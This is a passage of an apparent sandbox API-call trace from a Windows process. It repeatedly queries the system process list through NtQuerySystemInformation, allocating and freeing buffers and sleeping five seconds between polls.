NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0174.649] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0174.652] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x160000, RegionSize=0xdea64*=0x10000) returned 0x0 [0174.652] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0xc0000004 [0174.653] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0174.653] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x160000, RegionSize=0xdea50*=0x20000) returned 0x0 [0174.654] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0174.806] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0174.807] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0174.816] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x160000, RegionSize=0xdea64*=0x10000) returned 0x0 [0174.817] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0xc0000004 [0174.818] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0174.818] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x160000, RegionSize=0xdea50*=0x20000) returned 0x0 [0174.818] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0175.119] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0175.120] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0175.126] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x160000, RegionSize=0xdea64*=0x10000) returned 0x0 [0175.127] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0xc0000004 [0175.130] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0175.130] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x160000, RegionSize=0xdea50*=0x20000) returned 0x0 [0175.130] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0175.308] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0175.309] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0175.312] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x160000, RegionSize=0xdea64*=0x10000) returned 0x0 [0175.312] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0xc0000004 [0175.313] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0175.313] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x160000, RegionSize=0xdea50*=0x20000) returned 0x0 [0175.314] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0175.551] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0175.552] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0175.556] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x160000, RegionSize=0xdea64*=0x10000) returned 0x0 [0175.557] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0xc0000004 [0175.558] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0175.558] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x160000, RegionSize=0xdea50*=0x20000) returned 0x0 [0175.558] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0175.767] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0175.768] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0175.777] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x160000, RegionSize=0xdea64*=0x10000) returned 0x0 [0175.778] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0xc0000004 [0175.779] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0175.779] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x160000, RegionSize=0xdea50*=0x20000) returned 0x0 [0175.779] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0175.911] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0175.912] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0175.915] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x160000, RegionSize=0xdea64*=0x10000) returned 0x0 [0175.916] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0xc0000004 [0175.917] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0175.917] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x160000, RegionSize=0xdea50*=0x20000) returned 0x0 [0175.918] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0176.067] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0176.068] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0176.072] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x160000, RegionSize=0xdea64*=0x10000) returned 0x0 [0176.072] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0xc0000004 [0176.073] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0176.073] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x160000, RegionSize=0xdea50*=0x20000) returned 0x0 [0176.074] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0176.266] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0176.277] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0176.290] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x160000, RegionSize=0xdea64*=0x10000) returned 0x0 [0176.291] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0xc0000004 [0176.296] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0176.297] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x160000, RegionSize=0xdea50*=0x20000) returned 0x0 [0176.297] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0176.662] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0176.665] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0176.669] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x160000, RegionSize=0xdea64*=0x10000) returned 0x0 [0176.669] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0xc0000004 [0176.670] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0176.671] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x160000, RegionSize=0xdea50*=0x20000) returned 0x0 [0176.671] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0176.809] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0176.810] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0176.849] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x160000, RegionSize=0xdea64*=0x10000) returned 0x0 [0176.849] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0xc0000004 [0176.850] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0176.851] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x160000, RegionSize=0xdea50*=0x20000) returned 0x0 [0176.851] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0177.172] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0177.172] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0177.295] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x160000, RegionSize=0xdea64*=0x10000) returned 0x0 [0177.295] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0xc0000004 [0177.296] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0177.297] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x160000, RegionSize=0xdea50*=0x20000) returned 0x0 [0177.297] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0177.545] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0177.546] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0177.551] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x160000, RegionSize=0xdea64*=0x10000) returned 0x0 [0177.587] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0xc0000004 [0177.588] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0177.589] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x160000, RegionSize=0xdea50*=0x20000) returned 0x0 [0177.589] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0177.772] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0177.775] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0177.777] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x160000, RegionSize=0xdea64*=0x10000) returned 0x0 [0177.777] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0xc0000004 [0177.780] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0177.780] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x160000, RegionSize=0xdea50*=0x20000) returned 0x0 [0177.780] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0177.924] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0177.924] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0177.931] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x160000, RegionSize=0xdea64*=0x10000) returned 0x0 [0177.931] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0xc0000004 [0177.932] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0177.932] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x160000, RegionSize=0xdea50*=0x20000) returned 0x0 [0177.932] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0178.042] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0178.043] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0178.045] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x160000, RegionSize=0xdea64*=0x10000) returned 0x0 [0178.046] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0xc0000004 [0178.047] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0178.047] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x160000, RegionSize=0xdea50*=0x20000) returned 0x0 [0178.048] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0178.154] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0178.155] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0178.308] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x160000, RegionSize=0xdea64*=0x10000) returned 0x0 [0178.308] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0xc0000004 [0178.309] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0178.309] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x160000, RegionSize=0xdea50*=0x20000) returned 0x0 [0178.310] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0178.516] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0178.517] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0178.522] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x160000, RegionSize=0xdea64*=0x10000) returned 0x0 [0178.523] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0xc0000004 [0178.524] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0178.524] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x160000, RegionSize=0xdea50*=0x20000) returned 0x0 [0178.525] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0178.677] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0178.678] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0178.683] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x160000, RegionSize=0xdea64*=0x10000) returned 0x0 [0178.683] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0xc0000004 [0178.684] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0178.684] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x160000, RegionSize=0xdea50*=0x20000) returned 0x0 [0178.685] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0178.855] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0178.855] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0178.859] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x160000, RegionSize=0xdea64*=0x10000) returned 0x0 [0178.859] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0xc0000004 [0178.860] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0178.860] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x160000, RegionSize=0xdea50*=0x20000) returned 0x0 [0178.860] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0178.979] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0178.980] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0178.984] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x160000, RegionSize=0xdea64*=0x10000) returned 0x0 [0178.984] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0xc0000004 [0178.985] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0178.985] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x160000, RegionSize=0xdea50*=0x20000) returned 0x0 [0178.985] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0179.088] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0179.089] 